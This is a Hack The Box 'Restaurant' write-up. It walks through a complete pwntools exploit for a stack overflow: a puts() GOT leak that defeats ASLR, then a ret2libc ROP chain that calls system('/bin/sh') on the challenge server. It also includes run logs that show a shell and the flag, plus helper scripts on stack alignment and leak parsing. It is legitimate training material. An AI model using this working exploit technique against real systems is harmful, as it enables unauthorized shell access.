Advanced Exploitation of HTB – Hack the Box – Restaurant Challenge

This tutorial is part of the “HTB – Hack the Box Series”. For the other challenges in the series, see HTB – Hack the Box Series.

Introduction

In this tutorial we work through the HTB – Hack the Box – Restaurant pwn challenge: a stack-based buffer overflow in a non-PIE, NX-enabled binary without a stack canary, exploited with a two-stage return-to-libc ROP chain written in Python with pwntools. The first stage leaks the runtime address of puts() through the GOT to defeat ASLR; the second returns into system("/bin/sh") in the leaked libc.

Setting Up the Environment

  • Prepare a local testing environment with Python 3 and pwntools (pip install pwntools), and keep the two files the challenge ships, the restaurant binary and its libc.so.6, in the working directory so the script can load them with ELF().

Exploit Development

The Python script at the end of this post exploits a stack-based buffer overflow in the fill() routine of the Restaurant binary. checksec (printed by pwntools when the ELF objects are created) tells us what we are working with: NX is enabled, so shellcode on the stack is out; there is no stack canary, so the saved return address can be overwritten; and the binary is not PIE, so its gadgets, the PLT and the GOT sit at fixed 0x400000-based addresses. Only libc is randomized by ASLR, and that is handled with a two-stage ret2libc chain:

  • Stage 1: pop rdi; ret / got.puts / puts@plt prints the address of puts() in the server's libc, then the chain returns into fill() to get a second overflow. Subtracting libc.symbols['puts'] (the offset of puts() inside the libc.so.6 the challenge ships) from the leak gives the libc base.
  • Stage 2: ret / pop rdi; ret / "/bin/sh" / system() in the rebased libc spawns a shell. The extra ret gadget keeps the stack 16-byte aligned on entry to system(), which otherwise crashes on an SSE instruction.
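As an added illustration of the two stages (example code written for this page, not part of the original exploit.py and not pwntools), the script below builds the same two chains from the addresses in the ROP dumps of the runs further down, using only the Python standard library. The binary's addresses (0x4010a3 pop rdi; ret, 0x400650 puts@plt, 0x601fa8 got.puts, 0x40063e ret, 0x400e4a fill, and 0x400040 as the target of the throwaway puts() call) are read straight from the dump; the libc offsets are the second run's absolute addresses minus the leaked base 0x7f434dc31000; the 40-byte overflow offset is the one from exploit.py. It also computes rsp mod 16 on entry to every function the chain calls, which is the reasoning behind the extra ret gadget, and flags a 0x0a byte in the payload.

```python
import struct

# Addresses copied from the ROP dumps in the runs below (restaurant is No PIE, base 0x400000).
POP_RDI_RET = 0x4010a3   # pop rdi; ret
PUTS_PLT    = 0x400650   # puts@plt
GOT_PUTS    = 0x601fa8   # GOT slot holding the libc address of puts()
RET         = 0x40063e   # ret
FILL        = 0x400e4a   # fill(), the routine with the overflow
SCRATCH     = 0x400040   # what elf.search(b"") resolved to for the throwaway puts() call

# libc offsets: the second run's absolute addresses minus the leaked base 0x7f434dc31000
LIBC_PUTS    = 0x80aa0
LIBC_RET     = 0x8aa
LIBC_POP_RDI = 0x215bf
LIBC_BINSH   = 0x1b3e1a
LIBC_SYSTEM  = 0x4f550

OVERFLOW_OFFSET = 40   # bytes from the start of the buffer to the saved return address
WORD = 8


def p64(value):
    return struct.pack("<Q", value)


# A chain is a list of 8-byte slots: ("gadget", addr, n_pops), ("arg", value) or ("call", addr).
def stage1_chain():
    """puts(scratch) to terminate the echo line, puts(got.puts) to leak, then back into fill()."""
    return [
        ("gadget", POP_RDI_RET, 1), ("arg", SCRATCH),  ("call", PUTS_PLT),
        ("gadget", POP_RDI_RET, 1), ("arg", GOT_PUTS), ("call", PUTS_PLT),
        ("gadget", RET, 0),
        ("call", FILL),
    ]


def stage2_chain(libc_base, align=True):
    """system("/bin/sh") in the rebased libc; align=False drops the extra ret gadget."""
    chain = [("gadget", libc_base + LIBC_RET, 0)] if align else []
    chain += [
        ("gadget", libc_base + LIBC_POP_RDI, 1), ("arg", libc_base + LIBC_BINSH),
        ("call", libc_base + LIBC_SYSTEM),
    ]
    return chain


def validate(chain):
    """Each pop gadget must be followed by exactly as many arg slots as it pops."""
    i = 0
    while i < len(chain):
        slot = chain[i]
        if slot[0] == "gadget":
            args = chain[i + 1:i + 1 + slot[2]]
            if len(args) != slot[2] or any(a[0] != "arg" for a in args):
                raise ValueError("gadget in slot %d expects %d arg slot(s)" % (i, slot[2]))
            i += 1 + slot[2]
        else:
            i += 1
    return True


def build_payload(chain):
    validate(chain)
    return b"A" * OVERFLOW_OFFSET + b"".join(p64(slot[1]) for slot in chain)


def entry_alignment(chain, rsp_mod16_at_ret=8):
    """rsp mod 16 on entry to every function the chain calls.

    When fill() executes its ret, rsp points at slot 0 of the chain and, because a
    normally called function finds its return address at an address == 8 (mod 16),
    rsp_mod16_at_ret is 8.  Each ret consumes one 8-byte slot.  The SysV ABI
    expects rsp == 8 (mod 16) at function entry; glibc's system() faults on an
    SSE move when that does not hold, which is why the extra ret gadget exists."""
    return [(slot[1], (rsp_mod16_at_ret + WORD * (i + 1)) % 16)
            for i, slot in enumerate(chain) if slot[0] == "call"]


def misaligned_calls(chain):
    return [addr for addr, mod in entry_alignment(chain) if mod != 8]


def contains_newline(payload):
    """A 0x0a inside the payload is truncated by any input routine that stops at '\\n'."""
    return b"\n" in payload


if __name__ == "__main__":
    base = 0x7f434dcb1aa0 - LIBC_PUTS   # puts() leaked in the successful run
    for name, chain in (("stage 1", stage1_chain()),
                        ("stage 2 with ret", stage2_chain(base)),
                        ("stage 2 without ret", stage2_chain(base, align=False))):
        print(name, [(hex(a), m) for a, m in entry_alignment(chain)],
              "misaligned:", [hex(a) for a in misaligned_calls(chain)],
              "newline:", contains_newline(build_payload(chain)))
```

Running it shows that the stage-2 chain enters system() with rsp == 8 (mod 16) only because of the leading ret; without it system() is entered at 0 (mod 16), which is the crash the author's comments in exploit.py are guarding against. Stage 1 enters its first puts() misaligned and still works, since puts() does not depend on the alignment the way system() does; this is why the author only needs the ret gadget before fill() and before system().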

Executing the Exploit

Run the script from the directory holding the challenge files; it connects to the HTB instance, sends both stages and drops into an interactive shell. Two runs are shown below: the first crashes the target with a segmentation fault, the second gives a shell and the flag.

└─$ python3 exploit.py
[*] '/home/toor/Downloads/pwn_restaurant/restaurant'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[*] '/home/toor/Downloads/pwn_restaurant/libc.so.6'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[+] Opening connection to 134.209.186.13 on port 30930: Done
/home/toor/Downloads/pwn_restaurant/exploit.py:18: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  r.sendlineafter("> ", "1")
/home/toor/.local/lib/python3.10/site-packages/pwnlib/tubes/tube.py:822: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  res = self.recvuntil(delim, timeout=timeout)
[*] Loading gadgets for '/home/toor/Downloads/pwn_restaurant/restaurant'
[*] 0x0000:         0x4010a3 pop rdi; ret
    0x0008:         0x400040 [arg0] rdi = 4194368
    0x0010:         0x400650
    0x0018:         0x4010a3 pop rdi; ret
    0x0020:         0x601fa8 [arg0] rdi = got.puts
    0x0028:         0x400650
    0x0030:         0x40063e 0x40063e()
    0x0038:         0x400e4a 0x400e4a()
/home/toor/Downloads/pwn_restaurant/exploit.py:52: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  r.recvuntil("\n")
/home/toor/Downloads/pwn_restaurant/exploit.py:54: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  r.recvuntil("\n")
/home/toor/Downloads/pwn_restaurant/exploit.py:56: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  leaked_addr_puts_libc = u64(r.recvuntil("\n").strip().ljust(8, b"\x00"))
[*] Leaked server's libc address, puts(): 0x23a18aa0
[*] Leaked server's libc base address: 0x23998000
[*] Loaded 199 cached gadgets for './libc.so.6'
[*] 0x0000:       0x239988aa 0x239988aa()
    0x0008:       0x239b95bf pop rdi; ret
    0x0010:       0x23b4be1a [arg0] rdi = 599047706
    0x0018:       0x239e7550
[*] Switching to interactive mode
 
Enjoy your AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xaa\x88\x99#/home/ctf/run_challenge.sh: line 2:    28 Segmentation fault      ./restaurant
[*] Got EOF while reading in interactive
$ whoami
$ ls
[*] Closed connection to 134.209.186.13 port 30930
[*] Got EOF while sending in interactive
The first run fails at the leak stage. puts() printed only four address bytes (0x23a18aa0) instead of the six bytes of a 0x7f... userland address: the fifth byte of the randomized libc address happened to be 0x0a, and recvuntil("\n") treated it as the end of the line. The libc base computed from the truncated value (0x23998000) is wrong, the stage-2 chain returns to unmapped addresses and the process dies with a segmentation fault, which is why whoami and ls get no answer. Simply rerunning produces a new randomized base, as the second run shows; a more robust fix is to read exactly six bytes with recvn(6) instead of reading up to a newline.
┌──(toor㉿kali)-[~/Downloads/pwn_restaurant]
└─$ python3 exploit.py
[*] '/home/toor/Downloads/pwn_restaurant/restaurant'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[*] '/home/toor/Downloads/pwn_restaurant/libc.so.6'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[+] Opening connection to 134.209.186.13 on port 30930: Done
/home/toor/Downloads/pwn_restaurant/exploit.py:18: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  r.sendlineafter("> ", "1")
/home/toor/.local/lib/python3.10/site-packages/pwnlib/tubes/tube.py:822: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  res = self.recvuntil(delim, timeout=timeout)
[*] Loaded 14 cached gadgets for './restaurant'
[*] 0x0000:         0x4010a3 pop rdi; ret
    0x0008:         0x400040 [arg0] rdi = 4194368
    0x0010:         0x400650
    0x0018:         0x4010a3 pop rdi; ret
    0x0020:         0x601fa8 [arg0] rdi = got.puts
    0x0028:         0x400650
    0x0030:         0x40063e 0x40063e()
    0x0038:         0x400e4a 0x400e4a()
/home/toor/Downloads/pwn_restaurant/exploit.py:52: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  r.recvuntil("\n")
/home/toor/Downloads/pwn_restaurant/exploit.py:54: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  r.recvuntil("\n")
/home/toor/Downloads/pwn_restaurant/exploit.py:56: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  leaked_addr_puts_libc = u64(r.recvuntil("\n").strip().ljust(8, b"\x00"))
[*] Leaked server's libc address, puts(): 0x7f434dcb1aa0
[*] Leaked server's libc base address: 0x7f434dc31000
[*] Loaded 199 cached gadgets for './libc.so.6'
[*] 0x0000:   0x7f434dc318aa 0x7f434dc318aa()
    0x0008:   0x7f434dc525bf pop rdi; ret
    0x0010:   0x7f434dde4e1a [arg0] rdi = 139927045951002
    0x0018:   0x7f434dc80550
[*] Switching to interactive mode
 
Enjoy your AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xaa\x18MC\x7f$ whoami
ctf
$ ls
flag.txt
libc.so.6
restaurant
run_challenge.sh
$ cat flag.txt
HTB{r3turn_2_th3_r3st4ur4nt!}$
┌──(toor㉿kali)-[~/Downloads/pwn_restaurant]
└─$ cat exploit.py   
from pwn import *

context.arch = 'amd64'

# ELF objects for the challenge binary and the libc it ships with
elf = ELF("./restaurant")
libc = ELF("./libc.so.6")


# 40 bytes of filler reach the saved return address of fill()
overflow_offset = 40
overflow = b'A' * overflow_offset

# connect to the challenge instance
r = remote('134.209.186.13', 30930)

# at the "> " menu prompt pick option 1, which reaches the vulnerable fill() routine
r.sendlineafter(b"> ", b"1")


#########################################################################
#                          Craft 1st rop payload                        #
#########################################################################

# Stage 1: leak the runtime address of puts() in the server's libc (ASLR bypass).
rop_elf = ROP(elf)
# The program echoes our input without a trailing newline. Call puts() on a harmless
# address first (the first hit of elf.search(b""), 0x400040 in the dump) purely so its
# trailing "\n" terminates that echo line; the leak then arrives on a clean line.
rop_elf.call(elf.plt['puts'], [next(elf.search(b""))])
# ROP() finds the "pop rdi; ret" gadget itself: rdi = got.puts (1st argument), then
# call puts@plt, which prints the libc address currently stored in the GOT entry of puts().
rop_elf.call(elf.plt['puts'], [elf.got['puts']])
# extra "ret" gadget to keep the stack 16-byte aligned for the next call
# (use print(rop_elf.dump()) to inspect the layout)
rop_elf.call((rop_elf.find_gadget(["ret"]))[0])
# return into fill() so we get a second overflow for the next stage
rop_elf.call(elf.symbols['fill'])

# combine into usable payload
rop_get_libc_aslr_addr = overflow + rop_elf.chain()
log.info(rop_elf.dump())


#########################################################################
#     Leak puts() ASLR address and get server's libc base address       #
#########################################################################

# trigger the overflow with the stage-1 chain
r.sendlineafter(b">", rop_get_libc_aslr_addr)
# skip the empty line the program prints first
r.recvuntil(b"\n")
# skip the "Enjoy your <input>" echo line (terminated by our throwaway puts() call)
r.recvuntil(b"\n")
# the next line is the raw address of puts() in the server's libc
leak = r.recvuntil(b"\n").rstrip(b"\n")
# a 64-bit userland address occupies six bytes; a shorter leak means one of the address
# bytes was 0x0a and recvuntil() cut the line short (see the failed first run above)
if len(leak) != 6:
    log.error("leak is %d bytes, expected 6: the address contained a newline byte, re-run" % len(leak))
leaked_addr_puts_libc = u64(leak.ljust(8, b"\x00"))
log.info("Leaked server's libc address, puts(): " + hex(leaked_addr_puts_libc))
# libc.symbols['puts'] is the offset of puts() inside libc.so.6; subtracting it gives the base
server_libc_base_addr = leaked_addr_puts_libc - libc.symbols['puts']
log.info("Leaked server's libc base address: " + hex(server_libc_base_addr))
# a libc base is always page aligned; anything else means the leak was mangled
assert server_libc_base_addr & 0xfff == 0, "libc base is not page aligned, leak was mangled"


# The challenge ships the exact libc, so the ELF object can be rebased directly.
# Other ROP challenges first need to identify the libc version from the leaked
# address, load an ELF of that version, and then assign the base address.
libc.address = server_libc_base_addr



#########################################################################
#                          Craft 2nd rop payload                        #
#########################################################################

# Stage 2: system("/bin/sh") in the rebased libc.
rop_libc = ROP(libc)
# "ret" gadget so the stack is 16-byte aligned on entry to system(); glibc's system()
# uses SSE instructions that fault on a misaligned stack (use print(rop_libc.dump()) to check)
rop_libc.call((rop_libc.find_gadget(["ret"]))[0])
rop_libc.call(libc.symbols['system'], [next(libc.search(b"/bin/sh\x00"))])

# combine into usable payload
rop_get_bash_exploit = overflow + rop_libc.chain()
log.info(rop_libc.dump())


#########################################################################
#                          Get shell on server                          #
#########################################################################

# second trip through fill(): overwrite the return address with the system("/bin/sh") chain
r.sendlineafter(b">", rop_get_bash_exploit)

r.interactive()
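The leak stage deserves a closer look, because it is exactly where the first run went wrong. The following example (added for this page; standard library only, with a small in-memory stand-in for a pwntools tube and constructed server output, none of it from the original exploit.py) replays both runs' values: the original recvuntil(b"\n") parse reproduces the four-byte leak 0x23a18aa0 of the failed run when the address contains a 0x0a byte, a six-byte read does not, and two sanity checks reject the truncated value before a libc base is computed from it. The puts() offset 0x80aa0 is derived from the second run's output (0x7f434dcb1aa0 - 0x7f434dc31000); the address 0x7f0a23a18aa0 used for the bad case is constructed to match the bytes the failed run printed.

```python
import struct

# libc.symbols['puts'] for the libc shipped with the challenge, derived from the
# successful run: 0x7f434dcb1aa0 - 0x7f434dc31000
LIBC_PUTS_OFFSET = 0x80aa0
ADDR_BYTES = 6   # a 64-bit userland address has two leading NUL bytes, so puts() emits six


class FakeTube:
    """In-memory stand-in for a pwntools tube (constructed for this example, not pwntools)."""

    def __init__(self, data):
        self.buf = data

    def recvuntil(self, delim):
        idx = self.buf.index(delim) + len(delim)
        out, self.buf = self.buf[:idx], self.buf[idx:]
        return out

    def recvn(self, n):
        if len(self.buf) < n:
            raise EOFError("short read")
        out, self.buf = self.buf[:n], self.buf[n:]
        return out


def server_output(puts_addr):
    """Constructed model of what the stage-1 chain makes the target print: a blank
    line, the 'Enjoy your <input>' echo terminated by the throwaway puts() call,
    then puts(got.puts), i.e. the address bytes up to the first NUL plus '\\n'."""
    raw = struct.pack("<Q", puts_addr)
    raw = raw[:raw.index(b"\x00")]
    return b"\nEnjoy your " + b"A" * 40 + b"<chain>" + b"<scratch>\n" + raw + b"\n> "


def unpack_leak(leak):
    return struct.unpack("<Q", leak.ljust(8, b"\x00"))[0]


def naive_leak(tube):
    """The original exploit.py approach: read the leak line up to the next '\\n'.
    Breaks when one of the address bytes is itself 0x0a."""
    tube.recvuntil(b"\n")            # blank line
    tube.recvuntil(b"\n")            # echo line
    return unpack_leak(tube.recvuntil(b"\n").rstrip(b"\n"))


def robust_leak(tube):
    """Read exactly six bytes, then discard the newline puts() appends.
    Assumes none of the six low bytes is NUL (puts() would stop early)."""
    tube.recvuntil(b"\n")
    tube.recvuntil(b"\n")
    leak = tube.recvn(ADDR_BYTES)
    tube.recvuntil(b"\n")
    return unpack_leak(leak)


def check_leak(puts_addr):
    """Sanity checks to apply before trusting a leaked puts() address."""
    problems = []
    if puts_addr.bit_length() != 47:
        problems.append("not a 47-bit 0x7f... userland address: leak truncated or garbled")
    if (puts_addr & 0xfff) != (LIBC_PUTS_OFFSET & 0xfff):
        problems.append("low 12 bits do not match the puts() offset in libc: wrong libc?")
    return problems


def libc_base(puts_addr):
    problems = check_leak(puts_addr)
    if problems:
        raise ValueError("; ".join(problems))
    return puts_addr - LIBC_PUTS_OFFSET


if __name__ == "__main__":
    good = 0x7f434dcb1aa0   # leak from the successful run
    bad = 0x7f0a23a18aa0    # constructed: fifth byte is 0x0a, matches the failed run's bytes
    for addr in (good, bad):
        naive = naive_leak(FakeTube(server_output(addr)))
        robust = robust_leak(FakeTube(server_output(addr)))
        print(hex(addr), "naive ->", hex(naive), check_leak(naive), "| recvn ->", hex(robust))
    print("libc base:", hex(libc_base(good)))
```

The low-12-bit check works because ASLR only randomizes libc at page granularity: whatever the base, the leaked address of puts() must end in the same three hex digits as its offset in libc.so.6 (0xaa0 here), so a mismatch means either a mangled leak or a different libc than the one shipped with the challenge.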
  • https://www.hackthebox.com/achievement/challenge/303878/200

Conclusion

The HTB – Hack the Box – Restaurant challenge is a compact exercise in exploit development: a classic stack overflow with no canary, turned into a shell with a leak-then-ret2libc ROP chain built in pwntools. The walkthrough above shows the full path, including the failed first attempt and why it failed, which is the kind of detail that matters when an exploit only works intermittently.

Cogeanu Marius (https://cogeanu.com)
